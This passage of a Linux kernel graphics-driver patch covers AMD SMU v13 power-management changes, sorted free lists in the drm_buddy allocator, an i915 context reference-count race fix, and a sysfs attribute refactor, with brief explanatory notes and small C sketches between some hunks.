+ 	.set_default_dpm_table = smu_v13_0_0_set_default_dpm_table,
+@@ -1945,9 +2033,12 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.baco_enter = smu_v13_0_0_baco_enter,
+ 	.baco_exit = smu_v13_0_0_baco_exit,
+ 	.mode1_reset_is_support = smu_v13_0_0_is_mode1_reset_supported,
+-	.mode1_reset = smu_v13_0_mode1_reset,
++	.mode1_reset = smu_v13_0_0_mode1_reset,
+ 	.set_mp1_state = smu_v13_0_0_set_mp1_state,
+ 	.set_df_cstate = smu_v13_0_0_set_df_cstate,
++	.send_hbm_bad_pages_num = smu_v13_0_0_smu_send_bad_mem_page_num,
++	.send_hbm_bad_channel_flag = smu_v13_0_0_send_bad_mem_channel_flag,
++	.gpo_control = smu_v13_0_gpo_control,
+ };
+ 
+ void smu_v13_0_0_set_ppt_funcs(struct smu_context *smu)
+@@ -1959,5 +2050,5 @@ void smu_v13_0_0_set_ppt_funcs(struct smu_context *smu)
+ 	smu->table_map = smu_v13_0_0_table_map;
+ 	smu->pwr_src_map = smu_v13_0_0_pwr_src_map;
+ 	smu->workload_map = smu_v13_0_0_workload_map;
+-	smu_v13_0_set_smu_mailbox_registers(smu);
++	smu_v13_0_0_set_smu_mailbox_registers(smu);
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 222924363a681..eea06939e7da1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -123,6 +123,7 @@ static struct cmn2asic_msg_mapping smu_v13_0_7_message_map[SMU_MSG_MAX_COUNT] =
+ 	MSG_MAP(SetMGpuFanBoostLimitRpm,	PPSMC_MSG_SetMGpuFanBoostLimitRpm,     0),
+ 	MSG_MAP(DFCstateControl,		PPSMC_MSG_SetExternalClientDfCstateAllow, 0),
+ 	MSG_MAP(ArmD3,				PPSMC_MSG_ArmD3,                       0),
++	MSG_MAP(AllowGpo,			PPSMC_MSG_SetGpoAllow,           0),
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_clk_map[SMU_CLK_COUNT] = {
+@@ -191,6 +192,7 @@ static struct cmn2asic_mapping smu_v13_0_7_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(SOC_PCC),
+ 	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ 	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_PPT_BIT] = {1, FEATURE_THROTTLERS_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_table_map[SMU_TABLE_COUNT] = {
+@@ -1711,6 +1713,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.mode1_reset = smu_v13_0_mode1_reset,
+ 	.set_mp1_state = smu_v13_0_7_set_mp1_state,
+ 	.set_df_cstate = smu_v13_0_7_set_df_cstate,
++	.gpo_control = smu_v13_0_gpo_control,
+ };
+ 
+ void smu_v13_0_7_set_ppt_funcs(struct smu_context *smu)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
+index e4f8f90ac5aa0..768b6e7dbd771 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.c
+@@ -233,6 +233,18 @@ static void __smu_cmn_send_msg(struct smu_context *smu,
+ 	WREG32(smu->msg_reg, msg);
+ }
+ 
++static int __smu_cmn_send_debug_msg(struct smu_context *smu,
++			       u32 msg,
++			       u32 param)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	WREG32(smu->debug_param_reg, param);
++	WREG32(smu->debug_msg_reg, msg);
++	WREG32(smu->debug_resp_reg, 0);
++
++	return 0;
++}
+ /**
+  * smu_cmn_send_msg_without_waiting -- send the message; don't wait for status
+  * @smu: pointer to an SMU context
+@@ -386,6 +398,12 @@ int smu_cmn_send_smc_msg(struct smu_context *smu,
+ 					       read_arg);
+ }
+ 
++int smu_cmn_send_debug_smc_msg(struct smu_context *smu,
++			 uint32_t msg)
++{
++	return __smu_cmn_send_debug_msg(smu, msg, 0);
++}
++
+ int smu_cmn_to_asic_specific_index(struct smu_context *smu,
+ 				   enum smu_cmn2asic_mapping_type type,
+ 				   uint32_t index)
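
__smu_cmn_send_debug_msg() above is fire-and-forget: the argument goes out first, then the message ID, then the response register is cleared so firmware can report back by overwriting it. A userspace sketch with volatile standing in for MMIO; the register roles follow the C2PMSG_53/75/54 offsets defined in the 13.0.0 hunk above, and treating them as param/msg/resp is an inference from the code:

    #include <stdint.h>

    struct smu_debug_mbox {
        volatile uint32_t param;   /* debug_param_reg */
        volatile uint32_t msg;     /* debug_msg_reg */
        volatile uint32_t resp;    /* debug_resp_reg */
    };

    static int send_debug_msg(struct smu_debug_mbox *m,
                              uint32_t msg, uint32_t param)
    {
        m->param = param;   /* argument before the message ID */
        m->msg = msg;
        m->resp = 0;        /* clear status; no polling afterwards */
        return 0;
    }

    int main(void)
    {
        struct smu_debug_mbox mbox = { 0 };

        return send_debug_msg(&mbox, 2 /* DEBUGSMC_MSG_Mode1Reset */, 0);
    }
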
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
+index 1526ce09c399b..f82cf76dd3a47 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu_cmn.h
+@@ -42,6 +42,9 @@ int smu_cmn_send_smc_msg(struct smu_context *smu,
+ 			 enum smu_message_type msg,
+ 			 uint32_t *read_arg);
+ 
++int smu_cmn_send_debug_smc_msg(struct smu_context *smu,
++			 uint32_t msg);
++
+ int smu_cmn_wait_for_response(struct smu_context *smu);
+ 
+ int smu_cmn_to_asic_specific_index(struct smu_context *smu,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 11bb593994718..3d1f50f481cfd 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -38,6 +38,25 @@ static void drm_block_free(struct drm_buddy *mm,
+ 	kmem_cache_free(slab_blocks, block);
+ }
+ 
++static void list_insert_sorted(struct drm_buddy *mm,
++			       struct drm_buddy_block *block)
++{
++	struct drm_buddy_block *node;
++	struct list_head *head;
++
++	head = &mm->free_list[drm_buddy_block_order(block)];
++	if (list_empty(head)) {
++		list_add(&block->link, head);
++		return;
++	}
++
++	list_for_each_entry(node, head, link)
++		if (drm_buddy_block_offset(block) < drm_buddy_block_offset(node))
++			break;
++
++	__list_add(&block->link, node->link.prev, &node->link);
++}
++
+ static void mark_allocated(struct drm_buddy_block *block)
+ {
+ 	block->header &= ~DRM_BUDDY_HEADER_STATE;
+@@ -52,8 +71,7 @@ static void mark_free(struct drm_buddy *mm,
+ 	block->header &= ~DRM_BUDDY_HEADER_STATE;
+ 	block->header |= DRM_BUDDY_FREE;
+ 
+-	list_add(&block->link,
+-		 &mm->free_list[drm_buddy_block_order(block)]);
++	list_insert_sorted(mm, block);
+ }
+ 
+ static void mark_split(struct drm_buddy_block *block)
+@@ -387,20 +405,26 @@ err_undo:
+ }
+ 
+ static struct drm_buddy_block *
+-get_maxblock(struct list_head *head)
++get_maxblock(struct drm_buddy *mm, unsigned int order)
+ {
+ 	struct drm_buddy_block *max_block = NULL, *node;
++	unsigned int i;
+ 
+-	max_block = list_first_entry_or_null(head,
+-					     struct drm_buddy_block,
+-					     link);
+-	if (!max_block)
+-		return NULL;
++	for (i = order; i <= mm->max_order; ++i) {
++		if (!list_empty(&mm->free_list[i])) {
++			node = list_last_entry(&mm->free_list[i],
++					       struct drm_buddy_block,
++					       link);
++			if (!max_block) {
++				max_block = node;
++				continue;
++			}
+ 
+-	list_for_each_entry(node, head, link) {
+-		if (drm_buddy_block_offset(node) >
+-		    drm_buddy_block_offset(max_block))
+-			max_block = node;
++			if (drm_buddy_block_offset(node) >
++			    drm_buddy_block_offset(max_block)) {
++				max_block = node;
++			}
++		}
+ 	}
+ 
+ 	return max_block;
+@@ -412,20 +436,23 @@ alloc_from_freelist(struct drm_buddy *mm,
+ 		    unsigned long flags)
+ {
+ 	struct drm_buddy_block *block = NULL;
+-	unsigned int i;
++	unsigned int tmp;
+ 	int err;
+ 
+-	for (i = order; i <= mm->max_order; ++i) {
+-		if (flags & DRM_BUDDY_TOPDOWN_ALLOCATION) {
+-			block = get_maxblock(&mm->free_list[i]);
+-			if (block)
+-				break;
+-		} else {
+-			block = list_first_entry_or_null(&mm->free_list[i],
+-							 struct drm_buddy_block,
+-							 link);
+-			if (block)
+-				break;
++	if (flags & DRM_BUDDY_TOPDOWN_ALLOCATION) {
++		block = get_maxblock(mm, order);
++		if (block)
++			/* Store the obtained block order */
++			tmp = drm_buddy_block_order(block);
++	} else {
++		for (tmp = order; tmp <= mm->max_order; ++tmp) {
++			if (!list_empty(&mm->free_list[tmp])) {
++				block = list_last_entry(&mm->free_list[tmp],
++							struct drm_buddy_block,
++							link);
++				if (block)
++					break;
++			}
+ 		}
+ 	}
+ 
+@@ -434,18 +461,18 @@ alloc_from_freelist(struct drm_buddy *mm,
+ 
+ 	BUG_ON(!drm_buddy_block_is_free(block));
+ 
+-	while (i != order) {
++	while (tmp != order) {
+ 		err = split_block(mm, block);
+ 		if (unlikely(err))
+ 			goto err_undo;
+ 
+ 		block = block->right;
+-		i--;
++		tmp--;
+ 	}
+ 	return block;
+ 
+ err_undo:
+-	if (i != order)
++	if (tmp != order)
+ 		__drm_buddy_free(mm, block);
+ 	return ERR_PTR(err);
+ }
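
With free lists kept sorted by offset, mark_free() pays an O(n) insertion, but get_maxblock() and the non-topdown path can simply take the tail of each non-empty list as the highest-offset candidate. A self-contained model of the sorted insert on a circular doubly linked list:

    #include <stdint.h>
    #include <stdio.h>

    struct block { uint64_t offset; struct block *prev, *next; };

    static void list_init(struct block *head)
    {
        head->prev = head->next = head;
    }

    static void insert_sorted(struct block *head, struct block *blk)
    {
        struct block *node = head->next;

        /* find the first node with a strictly larger offset */
        while (node != head && node->offset <= blk->offset)
            node = node->next;

        blk->prev = node->prev;       /* insert before node (tail if none) */
        blk->next = node;
        node->prev->next = blk;
        node->prev = blk;
    }

    int main(void)
    {
        struct block head, a = { 4096 }, b = { 0 }, c = { 8192 };

        list_init(&head);
        insert_sorted(&head, &a);
        insert_sorted(&head, &c);
        insert_sorted(&head, &b);
        for (struct block *n = head.next; n != &head; n = n->next)
            printf("%llu\n", (unsigned long long)n->offset); /* 0 4096 8192 */
        return 0;
    }
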
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_context.c b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+index 1e29b1e6d1868..2353723ca1bd2 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_context.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_context.c
+@@ -1688,6 +1688,10 @@ void i915_gem_init__contexts(struct drm_i915_private *i915)
+ 	init_contexts(&i915->gem.contexts);
+ }
+ 
++/*
++ * Note that this implicitly consumes the ctx reference, by placing
++ * the ctx in the context_xa.
++ */
+ static void gem_context_register(struct i915_gem_context *ctx,
+ 				 struct drm_i915_file_private *fpriv,
+ 				 u32 id)
+@@ -1703,10 +1707,6 @@ static void gem_context_register(struct i915_gem_context *ctx,
+ 	snprintf(ctx->name, sizeof(ctx->name), "%s[%d]",
+ 		 current->comm, pid_nr(ctx->pid));
+ 
+-	/* And finally expose ourselves to userspace via the idr */
+-	old = xa_store(&fpriv->context_xa, id, ctx, GFP_KERNEL);
+-	WARN_ON(old);
+-
+ 	spin_lock(&ctx->client->ctx_lock);
+ 	list_add_tail_rcu(&ctx->client_link, &ctx->client->ctx_list);
+ 	spin_unlock(&ctx->client->ctx_lock);
+@@ -1714,6 +1714,10 @@ static void gem_context_register(struct i915_gem_context *ctx,
+ 	spin_lock(&i915->gem.contexts.lock);
+ 	list_add_tail(&ctx->link, &i915->gem.contexts.list);
+ 	spin_unlock(&i915->gem.contexts.lock);
++
++	/* And finally expose ourselves to userspace via the idr */
++	old = xa_store(&fpriv->context_xa, id, ctx, GFP_KERNEL);
++	WARN_ON(old);
+ }
+ 
+ int i915_gem_context_open(struct drm_i915_private *i915,
+@@ -2199,14 +2203,22 @@ finalize_create_context_locked(struct drm_i915_file_private *file_priv,
+ 	if (IS_ERR(ctx))
+ 		return ctx;
+ 
++	/*
++	 * One for the xarray and one for the caller.  We need to grab
++	 * the reference *prior* to making the ctx visible to userspace
++	 * in gem_context_register(), as at any point after that
++	 * userspace can try to race us with another thread destroying
++	 * the context under our feet.
++	 */
++	i915_gem_context_get(ctx);
++
+ 	gem_context_register(ctx, file_priv, id);
+ 
+ 	old = xa_erase(&file_priv->proto_context_xa, id);
+ 	GEM_BUG_ON(old != pc);
+ 	proto_context_close(file_priv->dev_priv, pc);
+ 
+-	/* One for the xarray and one for the caller */
+-	return i915_gem_context_get(ctx);
++	return ctx;
+ }
+ 
+ struct i915_gem_context *
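
The reordering above closes a window where a racing GEM_CONTEXT_DESTROY could find the context in the xarray and drop its only reference before the creator had taken one for the caller. A minimal sketch of the acquire-before-publish rule, with invented names:

    #include <stdatomic.h>
    #include <stdlib.h>

    struct ctx { atomic_int ref; };
    static struct ctx *table[16];   /* stands in for the context xarray */

    static void ctx_get(struct ctx *c) { atomic_fetch_add(&c->ref, 1); }
    static void ctx_put(struct ctx *c)
    {
        if (atomic_fetch_sub(&c->ref, 1) == 1)
            free(c);
    }

    static struct ctx *finalize_create(struct ctx *c, unsigned id)
    {
        ctx_get(c);      /* caller's reference, taken while still private */
        table[id] = c;   /* publication: racers can find (and put) it now */
        return c;
    }

    int main(void)
    {
        struct ctx *c = calloc(1, sizeof(*c));

        if (!c)
            return 1;
        atomic_init(&c->ref, 1);              /* creation ref -> the table */
        c = finalize_create(c, 0);
        ctx_put(table[0]); table[0] = NULL;   /* simulated racing destroy */
        ctx_put(c);                           /* caller's put: still safe */
        return 0;
    }
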
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index 83bfeb872bdaa..fcbccd8d244e9 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -1343,8 +1343,13 @@ int intel_engines_init(struct intel_gt *gt)
+ 			return err;
+ 
+ 		err = setup(engine);
+-		if (err)
++		if (err) {
++			intel_engine_cleanup_common(engine);
+ 			return err;
++		}
++
++		/* The backend should now be responsible for cleanup */
++		GEM_BUG_ON(engine->release == NULL);
+ 
+ 		err = engine_init_common(engine);
+ 		if (err)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
+index d651ccd0ab20b..9486dd3bed991 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.c
+@@ -22,11 +22,9 @@ bool is_object_gt(struct kobject *kobj)
+ 	return !strncmp(kobj->name, "gt", 2);
+ }
+ 
+-struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
++struct intel_gt *intel_gt_sysfs_get_drvdata(struct kobject *kobj,
+ 					    const char *name)
+ {
+-	struct kobject *kobj = &dev->kobj;
+-
+ 	/*
+ 	 * We are interested in knowing from where the interface
+ 	 * has been called, whether it's called from gt/ or from
+@@ -38,6 +36,7 @@ struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
+ 	 * "struct drm_i915_private *" type.
+ 	 */
+ 	if (!is_object_gt(kobj)) {
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		return to_gt(i915);
+@@ -51,18 +50,18 @@ static struct kobject *gt_get_parent_obj(struct intel_gt *gt)
+ 	return &gt->i915->drm.primary->kdev->kobj;
+ }
+ 
+-static ssize_t id_show(struct device *dev,
+-		       struct device_attribute *attr,
++static ssize_t id_show(struct kobject *kobj,
++		       struct kobj_attribute *attr,
+ 		       char *buf)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 
+ 	return sysfs_emit(buf, "%u\n", gt->info.id);
+ }
+-static DEVICE_ATTR_RO(id);
++static struct kobj_attribute attr_id = __ATTR_RO(id);
+ 
+ static struct attribute *id_attrs[] = {
+-	&dev_attr_id.attr,
++	&attr_id.attr,
+ 	NULL,
+ };
+ ATTRIBUTE_GROUPS(id);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
+index 6232923a420d0..c3a123faee987 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs.h
+@@ -30,7 +30,7 @@ static inline struct intel_gt *kobj_to_gt(struct kobject *kobj)
+ 
+ void intel_gt_sysfs_register(struct intel_gt *gt);
+ void intel_gt_sysfs_unregister(struct intel_gt *gt);
+-struct intel_gt *intel_gt_sysfs_get_drvdata(struct device *dev,
++struct intel_gt *intel_gt_sysfs_get_drvdata(struct kobject *kobj,
+ 					    const char *name);
+ 
+ #endif /* SYSFS_GT_H */
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c b/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
+index 180dd6f3ef571..b108f0a8a044c 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_sysfs_pm.c
+@@ -24,14 +24,15 @@ enum intel_gt_sysfs_op {
+ };
+ 
+ static int
+-sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
++sysfs_gt_attribute_w_func(struct kobject *kobj, struct attribute *attr,
+ 			  int (func)(struct intel_gt *gt, u32 val), u32 val)
+ {
+ 	struct intel_gt *gt;
+ 	int ret;
+ 
+-	if (!is_object_gt(&dev->kobj)) {
++	if (!is_object_gt(kobj)) {
+ 		int i;
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		for_each_gt(gt, i915, i) {
+@@ -40,7 +41,7 @@ sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
+ 				break;
+ 		}
+ 	} else {
+-		gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++		gt = intel_gt_sysfs_get_drvdata(kobj, attr->name);
+ 		ret = func(gt, val);
+ 	}
+ 
+@@ -48,7 +49,7 @@ sysfs_gt_attribute_w_func(struct device *dev, struct device_attribute *attr,
+ }
+ 
+ static u32
+-sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
++sysfs_gt_attribute_r_func(struct kobject *kobj, struct attribute *attr,
+ 			  u32 (func)(struct intel_gt *gt),
+ 			  enum intel_gt_sysfs_op op)
+ {
+@@ -57,8 +58,9 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ 
+ 	ret = (op == INTEL_GT_SYSFS_MAX) ? 0 : (u32) -1;
+ 
+-	if (!is_object_gt(&dev->kobj)) {
++	if (!is_object_gt(kobj)) {
+ 		int i;
++		struct device *dev = kobj_to_dev(kobj);
+ 		struct drm_i915_private *i915 = kdev_minor_to_i915(dev);
+ 
+ 		for_each_gt(gt, i915, i) {
+@@ -77,7 +79,7 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ 			}
+ 		}
+ 	} else {
+-		gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++		gt = intel_gt_sysfs_get_drvdata(kobj, attr->name);
+ 		ret = func(gt);
+ 	}
+ 
+@@ -92,6 +94,76 @@ sysfs_gt_attribute_r_func(struct device *dev, struct device_attribute *attr,
+ #define sysfs_gt_attribute_r_max_func(d, a, f) \
+ 		sysfs_gt_attribute_r_func(d, a, f, INTEL_GT_SYSFS_MAX)
+ 
++#define INTEL_GT_SYSFS_SHOW(_name, _attr_type)							\
++	static ssize_t _name##_show_common(struct kobject *kobj,				\
++					   struct attribute *attr, char *buff)			\
++	{											\
++		u32 val = sysfs_gt_attribute_r_##_attr_type##_func(kobj, attr,			\
++								   __##_name##_show);		\
++												\
++		return sysfs_emit(buff, "%u\n", val);						\
++	}											\
++	static ssize_t _name##_show(struct kobject *kobj,					\
++				    struct kobj_attribute *attr, char *buff)			\
++	{											\
++		return _name ##_show_common(kobj, &attr->attr, buff);				\
++	}											\
++	static ssize_t _name##_dev_show(struct device *dev,					\
++					struct device_attribute *attr, char *buff)		\
++	{											\
++		return _name##_show_common(&dev->kobj, &attr->attr, buff);			\
++	}
++
++#define INTEL_GT_SYSFS_STORE(_name, _func)						\
++	static ssize_t _name##_store_common(struct kobject *kobj,			\
++					    struct attribute *attr,			\
++					    const char *buff, size_t count)		\
++	{										\
++		int ret;								\
++		u32 val;								\
++											\
++		ret = kstrtou32(buff, 0, &val);						\
++		if (ret)								\
++			return ret;							\
++											\
++		ret = sysfs_gt_attribute_w_func(kobj, attr, _func, val);		\
++											\
++		return ret ?: count;							\
++	}										\
++	static ssize_t _name##_store(struct kobject *kobj,				\
++				     struct kobj_attribute *attr, const char *buff,	\
++				     size_t count)					\
++	{										\
++		return _name##_store_common(kobj, &attr->attr, buff, count);		\
++	}										\
++	static ssize_t _name##_dev_store(struct device *dev,				\
++					 struct device_attribute *attr,			\
++					 const char *buff, size_t count)		\
++	{										\
++		return _name##_store_common(&dev->kobj, &attr->attr, buff, count);	\
++	}
++
++#define INTEL_GT_SYSFS_SHOW_MAX(_name) INTEL_GT_SYSFS_SHOW(_name, max)
++#define INTEL_GT_SYSFS_SHOW_MIN(_name) INTEL_GT_SYSFS_SHOW(_name, min)
++
++#define INTEL_GT_ATTR_RW(_name) \
++	static struct kobj_attribute attr_##_name = __ATTR_RW(_name)
++
++#define INTEL_GT_ATTR_RO(_name) \
++	static struct kobj_attribute attr_##_name = __ATTR_RO(_name)
++
++#define INTEL_GT_DUAL_ATTR_RW(_name) \
++	static struct device_attribute dev_attr_##_name = __ATTR(_name, 0644,		\
++								 _name##_dev_show,	\
++								 _name##_dev_store);	\
++	INTEL_GT_ATTR_RW(_name)
++
++#define INTEL_GT_DUAL_ATTR_RO(_name) \
++	static struct device_attribute dev_attr_##_name = __ATTR(_name, 0444,		\
++								 _name##_dev_show,	\
++								 NULL);			\
++	INTEL_GT_ATTR_RO(_name)
++
+ #ifdef CONFIG_PM
+ static u32 get_residency(struct intel_gt *gt, i915_reg_t reg)
+ {
+@@ -104,11 +176,8 @@ static u32 get_residency(struct intel_gt *gt, i915_reg_t reg)
+ 	return DIV_ROUND_CLOSEST_ULL(res, 1000);
+ }
+ 
+-static ssize_t rc6_enable_show(struct device *dev,
+-			       struct device_attribute *attr,
+-			       char *buff)
++static u8 get_rc6_mask(struct intel_gt *gt)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
+ 	u8 mask = 0;
+ 
+ 	if (HAS_RC6(gt->i915))
+@@ -118,37 +187,35 @@ static ssize_t rc6_enable_show(struct device *dev,
+ 	if (HAS_RC6pp(gt->i915))
+ 		mask |= BIT(2);
+ 
+-	return sysfs_emit(buff, "%x\n", mask);
++	return mask;
+ }
+ 
+-static u32 __rc6_residency_ms_show(struct intel_gt *gt)
++static ssize_t rc6_enable_show(struct kobject *kobj,
++			       struct kobj_attribute *attr,
++			       char *buff)
+ {
+-	return get_residency(gt, GEN6_GT_GFX_RC6);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
++
++	return sysfs_emit(buff, "%x\n", get_rc6_mask(gt));
+ }
+ 
+-static ssize_t rc6_residency_ms_show(struct device *dev,
+-				     struct device_attribute *attr,
+-				     char *buff)
++static ssize_t rc6_enable_dev_show(struct device *dev,
++				   struct device_attribute *attr,
++				   char *buff)
+ {
+-	u32 rc6_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						      __rc6_residency_ms_show);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(&dev->kobj, attr->attr.name);
+ 
+-	return sysfs_emit(buff, "%u\n", rc6_residency);
++	return sysfs_emit(buff, "%x\n", get_rc6_mask(gt));
+ }
+ 
+-static u32 __rc6p_residency_ms_show(struct intel_gt *gt)
++static u32 __rc6_residency_ms_show(struct intel_gt *gt)
+ {
+-	return get_residency(gt, GEN6_GT_GFX_RC6p);
++	return get_residency(gt, GEN6_GT_GFX_RC6);
+ }
+ 
+-static ssize_t rc6p_residency_ms_show(struct device *dev,
+-				      struct device_attribute *attr,
+-				      char *buff)
++static u32 __rc6p_residency_ms_show(struct intel_gt *gt)
+ {
+-	u32 rc6p_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__rc6p_residency_ms_show);
+-
+-	return sysfs_emit(buff, "%u\n", rc6p_residency);
++	return get_residency(gt, GEN6_GT_GFX_RC6p);
+ }
+ 
+ static u32 __rc6pp_residency_ms_show(struct intel_gt *gt)
+@@ -156,67 +223,69 @@ static u32 __rc6pp_residency_ms_show(struct intel_gt *gt)
+ 	return get_residency(gt, GEN6_GT_GFX_RC6pp);
+ }
+ 
+-static ssize_t rc6pp_residency_ms_show(struct device *dev,
+-				       struct device_attribute *attr,
+-				       char *buff)
+-{
+-	u32 rc6pp_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__rc6pp_residency_ms_show);
+-
+-	return sysfs_emit(buff, "%u\n", rc6pp_residency);
+-}
+-
+ static u32 __media_rc6_residency_ms_show(struct intel_gt *gt)
+ {
+ 	return get_residency(gt, VLV_GT_MEDIA_RC6);
+ }
+ 
+-static ssize_t media_rc6_residency_ms_show(struct device *dev,
+-					   struct device_attribute *attr,
+-					   char *buff)
+-{
+-	u32 rc6_residency = sysfs_gt_attribute_r_min_func(dev, attr,
+-						__media_rc6_residency_ms_show);
++INTEL_GT_SYSFS_SHOW_MIN(rc6_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(rc6p_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(rc6pp_residency_ms);
++INTEL_GT_SYSFS_SHOW_MIN(media_rc6_residency_ms);
+ 
+-	return sysfs_emit(buff, "%u\n", rc6_residency);
+-}
+-
+-static DEVICE_ATTR_RO(rc6_enable);
+-static DEVICE_ATTR_RO(rc6_residency_ms);
+-static DEVICE_ATTR_RO(rc6p_residency_ms);
+-static DEVICE_ATTR_RO(rc6pp_residency_ms);
+-static DEVICE_ATTR_RO(media_rc6_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6_enable);
++INTEL_GT_DUAL_ATTR_RO(rc6_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6p_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(rc6pp_residency_ms);
++INTEL_GT_DUAL_ATTR_RO(media_rc6_residency_ms);
+ 
+ static struct attribute *rc6_attrs[] = {
++	&attr_rc6_enable.attr,
++	&attr_rc6_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *rc6p_attrs[] = {
++	&attr_rc6p_residency_ms.attr,
++	&attr_rc6pp_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *media_rc6_attrs[] = {
++	&attr_media_rc6_residency_ms.attr,
++	NULL
++};
++
++static struct attribute *rc6_dev_attrs[] = {
+ 	&dev_attr_rc6_enable.attr,
+ 	&dev_attr_rc6_residency_ms.attr,
+ 	NULL
+ };
+ 
+-static struct attribute *rc6p_attrs[] = {
++static struct attribute *rc6p_dev_attrs[] = {
+ 	&dev_attr_rc6p_residency_ms.attr,
+ 	&dev_attr_rc6pp_residency_ms.attr,
+ 	NULL
+ };
+ 
+-static struct attribute *media_rc6_attrs[] = {
++static struct attribute *media_rc6_dev_attrs[] = {
+ 	&dev_attr_media_rc6_residency_ms.attr,
+ 	NULL
+ };
+ 
+ static const struct attribute_group rc6_attr_group[] = {
+ 	{ .attrs = rc6_attrs, },
+-	{ .name = power_group_name, .attrs = rc6_attrs, },
++	{ .name = power_group_name, .attrs = rc6_dev_attrs, },
+ };
+ 
+ static const struct attribute_group rc6p_attr_group[] = {
+ 	{ .attrs = rc6p_attrs, },
+-	{ .name = power_group_name, .attrs = rc6p_attrs, },
++	{ .name = power_group_name, .attrs = rc6p_dev_attrs, },
+ };
+ 
+ static const struct attribute_group media_rc6_attr_group[] = {
+ 	{ .attrs = media_rc6_attrs, },
+-	{ .name = power_group_name, .attrs = media_rc6_attrs, },
++	{ .name = power_group_name, .attrs = media_rc6_dev_attrs, },
+ };
+ 
+ static int __intel_gt_sysfs_create_group(struct kobject *kobj,
+@@ -271,104 +340,34 @@ static u32 __act_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_rps_read_actual_frequency(&gt->rps);
+ }
+ 
+-static ssize_t act_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 actual_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						    __act_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", actual_freq);
+-}
+-
+ static u32 __cur_freq_mhz_show(struct intel_gt *gt)
+ {
